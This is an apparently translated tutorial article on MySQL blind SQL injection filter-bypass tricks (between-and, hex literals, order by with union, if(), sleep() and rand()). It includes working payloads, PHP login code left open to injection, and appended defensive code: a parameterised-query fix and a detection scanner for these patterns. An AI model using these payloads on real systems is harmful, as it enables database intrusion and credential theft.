2025-01-29 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
In this issue the editor looks at a few SQL injection tricks. The article is detailed and analysed from a professional point of view; I hope you get something out of it.
Replacing comparison operators with between and
The BETWEEN ... AND operator selects the data lying in a range between two values. The values can be numeric, text or dates.
Because of this, between and can also serve as a comparison:
exp1 between min and max
If the result of exp1 lies between min and max, the expression returns 1, otherwise it returns 0.
Example

mysql> select * from user;
+----+----------+----------------------------------+------------------+
| id | username | password                         | email            |
+----+----------+----------------------------------+------------------+
|  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
|  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |
|  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com |
|  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
+----+----------+----------------------------------+------------------+

mysql> select * from user where id between 1 and 2;
+----+----------+----------------------------------+------------------+
| id | username | password                         | email            |
+----+----------+----------------------------------+------------------+
|  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
|  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |
+----+----------+----------------------------------+------------------+
Most databases support between and, but they treat the boundaries differently. In MySQL, between and includes both boundaries, which in mathematical notation is the closed interval [min,max].
Application in blind injection
When comparison operators such as =, like, regexp and > are filtered, between and can be used in their place.

mysql> select database();
+------------+
| database() |
+------------+
| test       |
+------------+
1 row in set (0.00 sec)
1. Combined with a substring function

mysql> select mid(database(),1,1) between 'a' and 'a';
+-----------------------------------------+
| mid(database(),1,1) between 'a' and 'a' |
+-----------------------------------------+
|                                       0 |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> select mid(database(),1,1) between 't' and 't';
+-----------------------------------------+
| mid(database(),1,1) between 't' and 't' |
+-----------------------------------------+
|                                       1 |
+-----------------------------------------+
1 row in set (0.00 sec)
2. The substring function is filtered
Expression:
select exp between min and max
When the substring function is filtered, the way min and max have to be chosen changes.
Test 1

mysql> select 'b' between 'a' and 'c';
+-------------------------+
| 'b' between 'a' and 'c' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select 'b' between 'a' and 'b';
+-------------------------+
| 'b' between 'a' and 'b' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select 'b' between 'b' and 'c';
+-------------------------+
| 'b' between 'b' and 'c' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)
Test 2

mysql> select 'bcd' between 'a' and 'c';
+---------------------------+
| 'bcd' between 'a' and 'c' |
+---------------------------+
|                         1 |
+---------------------------+
1 row in set (0.00 sec)

mysql> select 'bcd' between 'a' and 'b';
+---------------------------+
| 'bcd' between 'a' and 'b' |
+---------------------------+
|                         0 |
+---------------------------+
1 row in set (0.00 sec)

mysql> select 'bcd' between 'b' and 'c';
+---------------------------+
| 'bcd' between 'b' and 'c' |
+---------------------------+
|                         1 |
+---------------------------+
1 row in set (0.00 sec)
From the tests: when exp is a single character, all three intervals return 1; when exp is a longer string, the interval a-b returns 0 while a-c and b-c return 1.
That is, when a string is compared, only the lower side of the interval is included: the effective range for the first character is [b,c).
So in actual use, pay attention to how the range is chosen.
Actual test

mysql> select database() between 'a' and 'z';
+--------------------------------+
| database() between 'a' and 'z' |
+--------------------------------+
|                              1 |
+--------------------------------+
1 row in set (0.05 sec)

mysql> select database() between 't' and 'z';
+--------------------------------+
| database() between 't' and 'z' |
+--------------------------------+
|                              1 |
+--------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 'u' and 'z';
+--------------------------------+
| database() between 'u' and 'z' |
+--------------------------------+
|                              0 |
+--------------------------------+
1 row in set (0.00 sec)

As the result shows, the first character is t.
Second character

mysql> select database() between 'ta' and 'tz';
+----------------------------------+
| database() between 'ta' and 'tz' |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 'te' and 'tz';
+----------------------------------+
| database() between 'te' and 'tz' |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 'tf' and 'tz';
+----------------------------------+
| database() between 'tf' and 'tz' |
+----------------------------------+
|                                0 |
+----------------------------------+
1 row in set (0.00 sec)

The remaining characters follow in the same way; the final result is test.
3. Single quotation marks are filtered
Between and also accepts hexadecimal literals, so hexadecimal can be used when single quotation marks are filtered.
Test

mysql> select database() between 0x61 and 0x7a;  # same as: database() between 'a' and 'z'
+----------------------------------+
| database() between 0x61 and 0x7a |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 0x74 and 0x7a;  # same as: database() between 't' and 'z'
+----------------------------------+
| database() between 0x74 and 0x7a |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 0x75 and 0x7a;  # same as: database() between 'u' and 'z'
+----------------------------------+
| database() between 0x75 and 0x7a |
+----------------------------------+
|                                0 |
+----------------------------------+
1 row in set (0.00 sec)
Learn about order by
order by is how MySQL sorts the rows returned by a query.
Usage example

select * from <table name> order by <column name or number> asc;   -- ascending (the default)
select * from <table name> order by <column name or number> desc;  -- descending
The point here is that either a column name or a column number can follow order by. For example:
id is the first column of the user table, so sorting by id can be written in two ways:

select * from user order by id;
select * from user order by 1;
Order by blind injection
Blind injection combined with union
I saw this at the monthly match of the Anheng Cup.
Background key code
$sql = "select * from admin where username='" . $username . "'";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if (isset($row) && $row['username'] != "admin") {
    $hit = "username error!";
} else {
    if ($row['password'] == $password) {
        $hit = "";
    } else {
        $hit = "password error!";
    }
}
Payload

username=admin' or 1 union select 1,2,binary 'string' order by 3

The SQL statement becomes

select * from admin where username='admin' or 1 union select 1,2,binary 'string' order by 3
Here the third column is compared, that is, the injected string against the password, and the different responses returned by the page allow blind injection.
Note that it is best to add binary, because the comparison done by order by is otherwise not case-sensitive.
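The defensive counterpart to the background code above, added here as an example (it is not from the original article or the challenge): the same lookup in Python with sqlite3, where the username is a bound parameter and the order by column can only come from an allow-list, since an ORDER BY identifier cannot be parameterised. The table, its rows and the sort keys are constructed for the demo; the inputs shown being rejected are the order by payloads discussed on this page.

```python
import sqlite3

# Allow-list of sort keys a caller may request, mapped to real column names.
# An ORDER BY identifier cannot be sent as a bound parameter, so this lookup
# is what keeps "order by if(...)", "order by rand(...)" and "order by 3"
# out of the SQL text entirely.
SORT_COLUMNS = {"id": "id", "username": "username"}

def build_admin_query(sort_key, descending=False):
    """Return the SQL for the admin lookup; the username stays a ? placeholder."""
    column = SORT_COLUMNS.get(sort_key)
    if column is None:
        raise ValueError("unsupported sort column: %r" % (sort_key,))
    direction = "DESC" if descending else "ASC"
    return ("SELECT id, username, password FROM admin "
            "WHERE username = ? ORDER BY %s %s" % (column, direction))

def lookup_admin(conn, username, sort_key="id"):
    """Bound parameter instead of the page's string concatenation."""
    return conn.execute(build_admin_query(sort_key), (username,)).fetchall()

def rejected(sort_key):
    """True when the allow-list refuses sort_key."""
    try:
        build_admin_query(sort_key)
    except ValueError:
        return True
    return False

def demo_db():
    """Constructed in-memory table (hypothetical data, not the page's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin VALUES (?, ?, ?)",
                     [(1, "admin", "hashed-secret"), (2, "guest", "hashed-guest")])
    return conn

if __name__ == "__main__":
    conn = demo_db()
    # The union/order-by payload from the page is now only an unknown username.
    print(lookup_admin(conn, "admin' or 1 union select 1,2,binary 'string' order by 3"))
    print(lookup_admin(conn, "admin", sort_key="username"))
    for key in ("if(1=1,id,username)", "rand(true)", "3", "username"):
        print(key, "rejected" if rejected(key) else "allowed")
```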
Blind injection based on if ()
Need to know the column name
If the column used by order by differs, the page returned will of course differ, so blind injection can be done according to which column the result is sorted by.
Example:
order by if(1=1, id, username)
Numbers cannot be used in place of the column names here, because what if() returns is a character type, not an integer column position.
You don't need to know the column name
Payload
order by if(expression, 1, (select id from information_schema.tables))
If the expression is false, the statement fails with ERROR 1242 (21000): Subquery returns more than 1 row and the query returns nothing; if the expression is true, the normal page is returned.
Time-based blind injection
Payload
order by if(1=1, 1, sleep(1))
Test result
select * from ha order by if(1=1, 1, sleep(1));  # normal time
select * from ha order by if(1=2, 1, sleep(1));  # with delay
During the test it turned out that the delay was not 1 second for sleep(1), but more than 1 second.
It was eventually found that the delay is a multiple of the number of rows the query returns.
Calculation formula:
delay time = seconds of sleep(1) * number of rows returned
The ha table used in the test had five rows, so the delay was five seconds. If the query returns a lot of data, the delay becomes very long.
When writing a script, set a timeout parameter to avoid an excessively long delay.
Blind injection based on rand()
I won't repeat the principle, just look at the test results.
mysql> select * from ha order by rand(true);
+------+------+
| id   | name |
+------+------+
|    9 | NULL |
|    6 | NULL |
|    5 | NULL |
|    1 | dss  |
|    0 | dasd |
+------+------+

mysql> select * from ha order by rand(false);
+------+------+
| id   | name |
+------+------+
|    1 | dss  |
|    6 | NULL |
|    0 | dasd |
|    5 | NULL |
|    9 | NULL |
+------+------+

As can be seen, the sort order differs between rand(true) and rand(false), so the rand() function can be used for blind injection.
Example
order by rand(ascii(mid((select database()),1,1))>96)

The above is what the editor shares on how these SQL injection tricks work. If you have similar doubts, the analysis above should help clear them up; to learn more, you are welcome to follow the industry information channel.
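From the detection side, an added example that is not part of the original article: a small Python scanner whose rules correspond to the tricks walked through above (between applied to database() or a mid()/substr() result, hexadecimal bounds in place of quoted characters, order by driven by if()/rand()/sleep()/benchmark(), and a subquery inside order by), run over constructed sample statements of the kind that appear in a MySQL general query log. The rule names and the sample statements are my own.

```python
import re

# Each rule is a name plus a pattern matched against normalised query text.
# The patterns follow this page: BETWEEN standing in for =, >, < against a
# metadata or substring function, hex literals replacing quoted characters,
# and ORDER BY controlled by if()/rand()/sleep()/benchmark() or a subquery.
RULES = [
    ("between_hex",
     re.compile(r"\bbetween\s+0x[0-9a-f]+\s+and\s+0x[0-9a-f]+")),
    ("between_probe",
     re.compile(r"(?:database|user|version)\(\)\s*between\b"
                r"|(?:mid|substr|substring)\(.*?\)\s*between\b")),
    ("order_by_conditional",
     re.compile(r"order\s+by\s+(?:if|rand|sleep|benchmark)\s*\(")),
    ("order_by_subquery",
     re.compile(r"order\s+by\b.*\(\s*select\b")),
]

def normalise(query):
    """Lower-case and collapse whitespace so spacing variants hit the same rule."""
    return re.sub(r"\s+", " ", query.strip().lower())

def classify(query):
    """Return the names of the rules a single statement matches (empty if none)."""
    text = normalise(query)
    return [name for name, pattern in RULES if pattern.search(text)]

def scan(queries):
    """Return {statement: [rules]} for every statement that matched a rule."""
    hits = {}
    for query in queries:
        matched = classify(query)
        if matched:
            hits[query] = matched
    return hits

# Constructed sample statements (not from a real log). The first two are
# ordinary queries and must not fire; the rest mirror the page's tricks.
SAMPLE_QUERIES = [
    "select * from user where id between 1 and 2",
    "select * from user order by id desc",
    "select mid(database(),1,1) between 'a' and 'a'",
    "select database() between 0x74 and 0x7a",
    "select * from ha order by if(1=2,1,sleep(1))",
    "select * from ha order by rand(true)",
    "select * from ha order by if(1=2,1,(select id from information_schema.tables))",
]

if __name__ == "__main__":
    for query, rules in scan(SAMPLE_QUERIES).items():
        print(", ".join(rules).ljust(40), query)
```

The between_probe rule deliberately keys on the left-hand side being a metadata or substring function, so ordinary range queries on application columns stay quiet.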